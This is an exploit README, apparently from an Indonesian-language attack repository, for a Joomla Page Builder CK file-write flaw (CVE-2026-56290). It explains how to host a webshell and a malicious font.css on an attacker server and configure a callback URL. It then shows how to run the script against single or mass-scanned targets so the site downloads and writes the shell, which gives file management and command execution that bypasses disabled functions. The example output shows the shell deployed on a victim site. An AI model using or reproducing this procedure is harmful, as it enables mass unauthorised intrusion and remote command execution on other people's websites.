Share
## https://sploitus.com/exploit?id=DE8E4C54-212E-5C82-B28B-E597C1EEADD4
# CVE-2026-56290 โ€” Page Builder CK Custom Uploader Exploit

## File Structure

```
/root/pbck-exploit/
โ”œโ”€โ”€ pbck_exploit.py    # Exploit script (edit CALLBACK_URL di atas)
โ”œโ”€โ”€ uploader.php       # File manager lu (host di server lain)
โ”œโ”€โ”€ font.css           # CSS wrapper (host bareng uploader.php)
โ”œโ”€โ”€ hits.txt           # Auto-generated: shell URLs yang berhasil
โ””โ”€โ”€ README.md          # File ini
```

## Cara Setup

### Step 1: Edit `uploader.php` (opsional)
- Ganti `$PASSWORD` kalau mau pakai auth
- Default: no password, langsung bisa akses

### Step 2: Host files
Upload `uploader.php` dan `font.css` ke server manapun yang bisa diakses target:
- GitHub raw (gratis, gampang)
- VPS lu sendiri
- Pastebin / any hosting

**PENTING**: `font.css` harus 1 directory level di atas `uploader.php`, atau edit URL langsung.

Format `font.css`:
```css
@font-face { font-family: bb2; src: url(https://YOUR-SERVER.COM/path/uploader.php); }
```

### Step 3: Edit exploit
Buka `pbck_exploit.py`, edit bagian KONFIGURASI:

```python
CALLBACK_URL = "https://raw.githubusercontent.com/username/repo/main"
UPLOADER_FILENAME = "uploader.php"
SHELL_PATH = f"media/com_pagebuilderck/gfonts/{UPLOADER_FILENAME}"
EXPECTED_MARKER = "Uploader"  # judul HTML uploader lu
```

### Step 4: Run

```bash
# Single target
python3 pbck_exploit.py -u https://target.com

# Mass scan
python3 pbck_exploit.py -f domains.txt

# Dengan options
python3 pbck_exploit.py -f domains.txt --threads 30 --timeout 15 --insecure
```

## Cara Kerja Exploit

```
1. GET target homepage โ†’ ambil CSRF token
2. POST fonts.save (url=CALLBACK_URL/font.css)
   โ†’ Server fetch font.css dari URL lu
   โ†’ font.css bilang "src: url(uploader.php)"
   โ†’ Server fetch uploader.php
   โ†’ Tulis ke media/com_pagebuilderck/gfonts/uploader.php
3. GET target/media/com_pagebuilderck/gfonts/uploader.php
   โ†’ Verifikasi shell hidup
```

## Contoh Output

```
[*] Callback    : https://your-server.com/shells
[*] Shell path  : media/com_pagebuilderck/gfonts/uploader.php
[*] Marker      : 'Uploader'

[*] Target     : https://victim.com
[+] CSRF token : abc123def456...
[+] Index URL  : https://victim.com/index.php
[+] fonts.save : HTTP 200
[+] Shell path : https://victim.com/media/com_pagebuilderck/gfonts/uploader.php (HTTP 200)
[+] Shell title: 'Uploader'

[+] EXPLOIT SUCCESS!
[+] Shell URL: https://victim.com/media/com_pagebuilderck/gfonts/uploader.php
```

## Fitur Uploader

- ๐Ÿ“ Browse files & directories
- โฌ†๏ธ Upload files
- โฌ‡๏ธ Download files
- โœ๏ธ Edit files inline
- ๐Ÿ—‘๏ธ Delete files
- ๐Ÿ’ป Command exec (proc_open โ€” bypass shell_exec/system disable)
- ๐Ÿ“Š Server info
- ๐ŸŒ JSON API mode (?api=cmd, ?api=ls, ?api=upload, dll)

## Notes

- `font.css` harus accessible dari target server (public URL)
- Kalau target pakai firewall outbound, exploit gagal (gak bisa fetch callback)
- `proc_open` harus enabled di target (biasanya enabled di shared hosting)
- File tertulis ke `media/com_pagebuilderck/gfonts/` โ€” ini writable di Joomla